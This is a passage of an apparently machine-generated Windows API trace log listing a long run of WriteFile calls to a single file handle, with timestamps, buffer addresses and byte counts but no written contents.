	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfd12*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfd12*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfd31*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfd31*, lpNumberOfBytesWritten=0x129420*=0x27, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfd5a*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfd5a*, lpNumberOfBytesWritten=0x129420*=0x1a, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfd76*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfd76*, lpNumberOfBytesWritten=0x129420*=0x5b, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cfdd3*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfdd3*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cfe18*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfe18*, lpNumberOfBytesWritten=0x129420*=0x4c, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cfe66*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfe66*, lpNumberOfBytesWritten=0x129420*=0x4d, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cfeb5*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfeb5*, lpNumberOfBytesWritten=0x129420*=0xb, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cfec2*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfec2*, lpNumberOfBytesWritten=0x129420*=0x53, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cff17*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cff17*, lpNumberOfBytesWritten=0x129420*=0x31, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cff4a*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cff4a*, lpNumberOfBytesWritten=0x129420*=0x10, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.960] WriteFile (in: hFile=0x534, lpBuffer=0x26cff5c*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cff5c*, lpNumberOfBytesWritten=0x129420*=0x39, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26cff97*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cff97*, lpNumberOfBytesWritten=0x129420*=0x4a, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26cffe3*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cffe3*, lpNumberOfBytesWritten=0x129420*=0x56, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26d003b*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d003b*, lpNumberOfBytesWritten=0x129420*=0xd, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26d004a*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d004a*, lpNumberOfBytesWritten=0x129420*=0x45, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26d0091*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0091*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26d00a8*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d00a8*, lpNumberOfBytesWritten=0x129420*=0x37, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x26d00e1*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d00e1*, lpNumberOfBytesWritten=0x129420*=0x38, lpOverlapped=0x0) returned 1
	[0201.961] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d011b*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d011b*, lpNumberOfBytesWritten=0x129420*=0x4a, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d0167*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0167*, lpNumberOfBytesWritten=0x129420*=0x58, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d01c1*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d01c1*, lpNumberOfBytesWritten=0x129420*=0x1c, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d01df*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d01df*, lpNumberOfBytesWritten=0x129420*=0x22, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d0203*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0203*, lpNumberOfBytesWritten=0x129420*=0x18, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d021d*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d021d*, lpNumberOfBytesWritten=0x129420*=0x30, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d024f*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d024f*, lpNumberOfBytesWritten=0x129420*=0x46, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x26d0297*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0297*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0201.962] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d02ea*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d02ea*, lpNumberOfBytesWritten=0x129420*=0x3e, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d032a*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d032a*, lpNumberOfBytesWritten=0x129420*=0x4e, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d037a*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d037a*, lpNumberOfBytesWritten=0x129420*=0x3d, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d03b9*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d03b9*, lpNumberOfBytesWritten=0x129420*=0x4a, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d0405*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0405*, lpNumberOfBytesWritten=0x129420*=0x2c, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d0433*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0433*, lpNumberOfBytesWritten=0x129420*=0x1f, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d0454*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0454*, lpNumberOfBytesWritten=0x129420*=0x31, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.963] WriteFile (in: hFile=0x534, lpBuffer=0x26d0487*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0487*, lpNumberOfBytesWritten=0x129420*=0x38, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d04c1*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d04c1*, lpNumberOfBytesWritten=0x129420*=0x13, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d04d6*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d04d6*, lpNumberOfBytesWritten=0x129420*=0x55, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d052d*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d052d*, lpNumberOfBytesWritten=0x129420*=0x14, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d0543*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0543*, lpNumberOfBytesWritten=0x129420*=0x30, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d0575*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0575*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d05bb*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d05bb*, lpNumberOfBytesWritten=0x129420*=0x56, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.964] WriteFile (in: hFile=0x534, lpBuffer=0x26d0613*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0613*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d0639*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0639*, lpNumberOfBytesWritten=0x129420*=0x20, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d065b*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d065b*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d0672*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0672*, lpNumberOfBytesWritten=0x129420*=0x20, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d0694*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0694*, lpNumberOfBytesWritten=0x129420*=0x2d, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d06c3*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d06c3*, lpNumberOfBytesWritten=0x129420*=0x37, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d06fc*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d06fc*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x26d071b*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d071b*, lpNumberOfBytesWritten=0x129420*=0x35, lpOverlapped=0x0) returned 1
	[0201.965] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d0752*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0752*, lpNumberOfBytesWritten=0x129420*=0x10, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d0764*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0764*, lpNumberOfBytesWritten=0x129420*=0x3a, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
